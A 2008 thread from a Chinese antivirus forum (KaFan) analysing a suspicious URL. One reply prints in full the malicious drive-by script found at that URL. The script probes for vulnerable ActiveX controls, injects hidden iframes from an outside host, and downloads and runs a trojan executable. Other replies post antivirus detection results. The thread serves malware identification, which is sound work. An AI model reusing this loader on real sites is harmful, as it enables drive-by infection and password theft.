收藏本站 |切换到宽版 | 更换论坛皮肤
 找回密码  忘记邮箱  QQ快速登录  快速登录  快速注册

卡饭»论坛 安全区 病毒样本 分享&分析区 网络安全(毒网分析) 可疑网址一个,红伞嗷嗷叫
返回列表 发新帖
查看: 2393|回复: 7
收起左侧

[已鉴定] 可疑网址一个,红伞嗷嗷叫

 关闭 [复制链接]
qwerasdf123
发表于 2008-3-11 14:07:26 | 显示全部楼层 |阅读模式
hxxp://www.ackii.net/m1.htm?91915
挂在一个视频网站上
回复

举报

mox
发表于 2008-3-11 14:13:01 | 显示全部楼层

老朋友.了

<script>window.onerror=function(){return true;}</script>
<script>
window.defaultStatus="完成";
eval("if(document.cookie.indexOf('OK')==-1){

try{var eeeeeeee;

var dsb="Kaspersky";

var ado=(document.createElement("object"));

var Rising="classid";

var KV2008="Adodb.Stream";

var Kaspersky="clsid:BD96C556-65A3-11D0-983A-00C04FC29E36";

ado.setAttribute(Rising,Kaspersky);

var as=ado.createobject(KV2008,"")}

catch(eeeeeeee){};

finally{

var expires=new Date();

var dsb="Kaspersky";

expires.setTime(expires.getTime()+3*60*60*1000);

document.cookie='OK=Yes;path=/;expires='+expires.toGMTString();

if(eeeeeeee!="[object Error]"){

document.write("<script src=http://user3.1a2b3c0.net/ms06014.js></script>")}

else{

try{var ffffffff;

var ourgame=new ActiveXObject("GLCHAT.GLChatCtrl.1");}

catch(ffffffff){};

finally{if(ffffffff!="[object Error]"){

document.write('<iframe style=display:none src="http://user3.1a2b3c0.net/GLWORLD.html"></iframe>')}}

try{var gggggggg;

var storm=new ActiveXObject("MPS.StormPlayer");}

catch(gggggggg){};

finally{if(gggggggg!="[object Error]"){

document.write('<iframe style=display:none src="http://user3.1a2b3c0.net/StormII.html"></iframe>')}}

try{var hhhhhhhh;

var Real=new ActiveXObject("IERPCtl.IERPCtl.1");}

catch(hhhhhhhh){};

finally{if(hhhhhhhh!="[object Error]"){

document.write('<sCrIpT LAnGuAgE="jAvAsCrIpT" src=http://user3.1a2b3c0.net/real.js></script>')}}

try{var iiiiiiii;

var thunder=new ActiveXObject("DPClient.Vod");}

catch(iiiiiiii){};

finally{if(iiiiiiii!="[object Error]"){

document.write('<iframe style=display:none src="http://user3.1a2b3c0.net/Thunder.html"></iframe>')}}

try{var kkkkkkkk;

var Baidu=new ActiveXObject("BaiduBar.Tool");}

catch(kkkkkkkk){};

finally{if(kkkkkkkk!="[object Error]"){

Baidu["Dload"+"DS"]("http://user3.1a2b3c0.net/Baidu.cab", "Baidu.exe", 0)}}

if(ffffffff=="[object Error]" && gggggggg=="[object Error]" && hhhhhhhh=="[object Error]" && iiiiiiii=="[object Error]")

{

location.replace("about:blank");}

}}}")
</script>
回复

举报

啊弥陀佛
发表于 2008-3-11 14:41:40 | 显示全部楼层
微点砍掉
未命名.JPG
回复

举报

Joker
发表于 2008-3-11 16:35:05 | 显示全部楼层
C:\Documents and Settings\Administrator\桌面\Baidu.cab>>Baidu.exe        TrojanPSW.Delf.aqk.mivv        木马        还未处理
回复

举报

qigang
发表于 2008-3-11 20:41:20 | 显示全部楼层
老毒物,不更新!
回复

举报

hanq
发表于 2008-3-11 22:57:40 | 显示全部楼层
可疑链接已被安全规则过滤

我用theworld的黑名单规则就过滤掉了
回复

举报

mofunzone
发表于 2008-3-11 23:35:22 | 显示全部楼层
Starting the file scan:

Begin scan in 'C:\TDDOWNLOAD\Baidu.cab'
C:\TDDOWNLOAD\
  Baidu.cab
    [0] Archive type: CAB (Microsoft)
      --> Baidu.exe
        [1] Archive type: Runtime Packed
        --> Object
            [DETECTION] Is the Trojan horse TR/Autorun.BK
            [WARNING]   Infected files in archives cannot be repaired!
      [NOTE]      The file was deleted!
回复

举报

tanlimo
发表于 2008-3-12 00:19:14 | 显示全部楼层

1.png
回复

举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-11-15 01:46 , Processed in 0.130040 second(s), 20 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表